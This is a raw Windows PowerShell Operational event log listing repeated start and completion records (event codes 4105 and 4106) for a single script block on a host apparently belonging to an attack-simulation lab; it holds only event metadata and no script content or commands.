ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468159
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468158
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468157
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468156
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468155
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468154
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468153
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468152
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468151
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468150
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468149
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468148
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468147
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468146
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468145
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468144
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468143
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468142
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468141
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468140
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468139
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468138
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468137
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468136
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468135
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468134
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468133
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468132
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468131
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468130
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468129
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468128
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468127
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468126
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468125
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468124
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468123
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468122
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468121
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468120
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468119
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468118
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468117
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468116
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468115
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468114
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468113
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468112
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468111
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468110
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468109
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468108
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468107
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468106
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468105
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468104
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
